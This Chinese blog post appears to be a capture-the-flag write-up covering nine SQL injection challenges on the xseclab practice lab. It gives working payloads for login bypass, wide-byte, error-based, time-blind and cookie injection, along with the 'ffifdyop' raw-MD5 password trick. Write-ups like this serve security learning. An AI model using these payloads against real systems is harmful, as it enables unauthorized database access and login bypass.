• 网络安全实验室CTF-注入关


    注入关

    1

    用万能密钥登陆即可

    payload

    用户名:admin' or 1'='1

    密码随便

    2

    看了下注释,里面有提示参数是id

    试了下id=1 or 1=1 就拿到flag了 = =

    3

    试了好多都没有回显,最后宽字节ok%df%27or 1=1 --+

    正常步骤就可以拿到flag

    4

    看到url里有两个参数startnum

    在start参数后加引号,有报错

    看报错内容,发现在存在addslash函数,尝试发现SQL语句没有用引号包围

    有limit,所以使用procedure analyse和extractvalue报错

    payloadprocedure analyse(extractvalue(0x7e,concat(0x7e,version())),1)

    不能用引号,所以xxx_name要用hex编码

    剩下的就是正常步骤

    5

    = =!帅哥是狗???

    看了下注释,有id=1,应该是注入点

    试了半天没报错,布尔延时也试了,没作用

    。。。丢给sqlmap跑也没结果,看了wp,id不是注入点

    注入点在图片链接里,要用burp抓包才能看到返回值http://lab1.xseclab.com/sqli6_f37a4a60a4a234cd309ce48ce45b9b00/images/dog1.jpg%df'

    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''dog1.jpg運''' at line 1<br />
    <b>Warning</b>: mysql_fetch_row() expects parameter 1 to be resource, boolean given in <b>sqli6_f37a4a60a4a234cd309ce48ce45b9b00/images/myimages1.php</b> on line <b>18</b><br />
    

    后边就是正常步骤了(注释可以用--+)

    6

    这题告诉了说要用报错注入,先尝试'报错

    然后用floor报错语句即可

    and (select 1 from (select count(*), concat(database(), floor(rand(0)*2))x from information_schema.tables group by x)a)

    7

    题目说了是盲注

    ?username=admin' and if(database(),1,sleep(5))--+

    延迟了5秒,然后用ascii(substr((select xxx from xxx),1,1))=x

    写脚本 / sqlmap即可

    8

    找了半天没找到注入点,放到sqlmap跑也没结果,看了wp说注入点在cookie = =

    剩下的就是正常做法了cookie:id=1 or 1=1

    9

    这道题还是不会,看了wp

    收获了一个比较神奇的md5

    md5("ffifdyop")=276f722736c95d99e921722cf9ed621c

    md5("ffifdyop",TRUE)='or'6É]™é!r,ùíb

    这里的'or'xxxxx就可以绕过password的查询

    payload?id=1&pwd=ffifdyop

  • 相关阅读:
    Shell脚本编程基础之程序
    从入门到放弃
    Shell编写的俄罗斯方块游戏(亲测可用)
    Qt开发环境搭建
    day01
    day01
    浅析STM32内部FLASH读写
    基于STM32 的485通讯实验(f103)
    八、Servlet的常见错误总结:
    七、Servlet介绍
  • 原文地址:https://www.cnblogs.com/R3col/p/12577864.html
Copyright © 2020-2023  润新知